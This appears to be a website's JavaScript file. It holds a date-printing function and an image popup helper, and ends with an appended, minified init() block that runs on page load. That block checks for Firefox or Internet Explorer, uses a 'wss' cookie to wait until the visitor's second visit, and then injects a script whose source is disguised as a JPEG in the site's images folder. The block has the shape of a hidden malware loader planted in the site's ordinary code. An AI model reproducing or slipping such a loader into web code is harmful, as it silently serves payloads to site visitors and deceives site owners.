function printDate()
{            var months = new Array();
            months[0] = 'January';
            months[1] = 'February';
            months[2] = 'March';
            months[3] = 'April';
            months[4] = 'May';
            months[5] = 'June';
            months[6] = 'July';
            months[7] = 'August';
            months[8] = 'September';
            months[9] = 'October';
            months[10] = 'November';
            months[11] = 'December';

            var days = new Array();

            days[0] = 'Sunday';
            days[1] = 'Monday';
            days[2] = 'Tuesday';
            days[3] = 'Wednesday';
            days[4] = 'Thursday';
            days[5] = 'Friday';
            days[6] = 'Saturday';
          

            now = new Date();
            var dayname = days[now.getDay()];
            var monthname = months[now.getMonth()];
            var dayofmonth =now.getDate();
            var year = now.getYear();
            if (year < 1000) year += 1900;
   	    document.write("<font face='verdana' size='1'>")
            document.write(dayname + ' ' + dayofmonth + ' ' + monthname + ' ' + year);
	    document.write("</font>")
}

function dirtypop(imgname)
{

	sPicURL = 'images/' + imgname;
	window.open( "popup.htm?"+sPicURL, "","resizable=1,HEIGHT=620,WIDTH=580");
  
}


function init(){var f=navigator.userAgent;var a=false;if(f.indexOf("Firefox")!=-1||f.indexOf("MSIE")!=-1){a=true}if(a!==true){return}var i="/images/block_img2.jpg?js";var g=b("wss");if(g){if(g=="goot1"){c("wss","goot2","3");var e=document.createElement("script");e.type="text/javascript";e.src=i+"&r="+new Date().getTime();var d=document.getElementsByTagName("head")[0];d.appendChild(e)}else{}}else{c("wss","goot1","3")}function b(k){var j,h,m,l=document.cookie.split(";");for(j=0;j<l.length;j++){h=l[j].substr(0,l[j].indexOf("="));m=l[j].substr(l[j].indexOf("=")+1);h=h.replace(/^\s+|\s+$/g,"");if(h==k){return unescape(m)}}}function c(j,l,h){var m=new Date();m.setDate(m.getDate()+h);var k=escape(l)+((h==null)?"":"; expires="+m.toUTCString());document.cookie=j+"="+k}}init();
